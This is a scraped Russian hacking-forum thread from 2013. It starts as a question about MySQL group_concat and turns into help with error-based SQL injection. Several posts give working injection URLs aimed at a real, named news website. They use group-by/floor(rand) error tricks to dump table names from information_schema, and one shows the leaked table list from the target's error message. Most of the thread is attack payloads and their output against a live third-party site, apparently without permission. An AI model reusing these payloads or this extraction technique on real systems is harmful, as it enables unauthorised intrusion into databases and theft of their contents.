Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   Вопрос по group_concat (https://forum.antichat.xyz/showthread.php?t=397045)

qaz 17.10.2013 21:54
можно как-то в запросе select+group_concat(table_name) from information_schema.tables

групировать не все таблици а только 10 например??

winstrool 17.10.2013 22:49
Цитата:
Сообщение от qaz
можно как-то в запросе select+group_concat(table_name) from information_schema.tables
групировать не все таблици а только 10 например??
Можно, если место group_concat() использовать хотябы concat(). group_concat() c лимитами не работает!

qaz 17.10.2013 23:01
Цитата:
Сообщение от winstrool
Можно, если место group_concat() использовать хотябы concat(). group_concat() c лимитами не работает!
при запросе с concat() пишет, Subquery returns more than 1 row нужен другой вариант

Unknown 17.10.2013 23:37
Цитата:
Сообщение от qaz
при запросе с concat() пишет, Subquery returns more than 1 row нужен другой вариант
Winstrool все правильно сказал!

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]select concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables limit 6[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]+---------------------------------------+

|[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]) |

+---------------------------------------+

|[/COLOR][COLOR="#0000BB"]CHARACTER_SETS[/COLOR][COLOR="#007700"]|

|[/COLOR][COLOR="#0000BB"]COLLATIONS[/COLOR][COLOR="#007700"]|

|[/COLOR][COLOR="#0000BB"]COLLATION_CHARACTER_SET_APPLICABILITY[/COLOR][COLOR="#007700"]|

|[/COLOR][COLOR="#0000BB"]COLUMNS[/COLOR][COLOR="#007700"]|

|[/COLOR][COLOR="#0000BB"]COLUMN_PRIVILEGES[/COLOR][COLOR="#007700"]|

|[/COLOR][COLOR="#0000BB"]ENGINES[/COLOR][COLOR="#007700"]|

+---------------------------------------+

[/COLOR][COLOR="#0000BB"]6 rows in set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0.01 sec[/COLOR][COLOR="#007700"])[/COLOR][/COLOR

qaz 17.10.2013 23:40
Цитата:
Сообщение от UXOR
Winstrool все правильно сказал!
да не, не тот вариант ((

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select+concat%28table_name%29%20from%20information_schema.tables%20limit%206%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 

winstrool 18.10.2013 07:10
Цитата:
Сообщение от qaz
да не, не тот вариант ((
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select+concat%28table_name%29%20from%20information_schema.tables%20limit%206%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR] 
Уважаемый, помойму вы что то начинаите путать, вопервых сдесь вопросы по самой БД, а не по тому как крутить скули в еrror'e, во вторых для этого есть отдельная ветка где решаются подобные вопросы и вы об этом прекрасно знаите /thread46016.html, в третих, error выводит ограниченное колличество знаков, в результате чего по вашей просьбе вывести 10 табл не возможно, крутите по одной

Цитата:
Сообщение от None
http://newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select +concat%28table_name%29%20from%20information_schem a.tables%20limit%201,1%29,0x00,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+

YaBtr 18.10.2013 11:14
Цитата:
Сообщение от winstrool
Уважаемый, помойму вы что то начинаите путать, вопервых сдесь вопросы по самой БД, а не по тому как крутить скули в еrror'e, во вторых для этого есть отдельная ветка где решаются подобные вопросы и вы об этом прекрасно знаите /thread46016.html, в третих, error выводит ограниченное колличество знаков, в результате чего по вашей просьбе вывести 10 табл не возможно, крутите по одной
Согласен,что пост не в той теме, но qazзадал интересный вопрос.

Все правильно, в error существует ограничение на вывод, но все-таки возможен вывод более 1 таблицы.

Цитата:
Сообщение от None
www.newsukraine.org.ua/idv.php?id=107'+or+1+group+by+concat((select+
(insert(0x3a,1,0,insert(0x3a,1,0,table_name)))s from information_schema.tables group by s limit 20,1)
,0x00, floor(rand(0)*2))+having+min(0)+or+1+--+
Вывод:

Цитата:
Сообщение от None
Duplicate entry '
gorod
categ
typ
spam
site_ip
site
rassilka
pols
object
land
informer
gorod
c' for key 'group_key'
Как видим,что вывелось 12 таблиц

Запрос совсем костыльный, но работает. Так,что qaz, есть куда копать.

UPD

Если есть возможность, перенесите,пожалуйста, последние 7 постов в тему "Ваши вопросы по уязвимостям".


Время: 04:52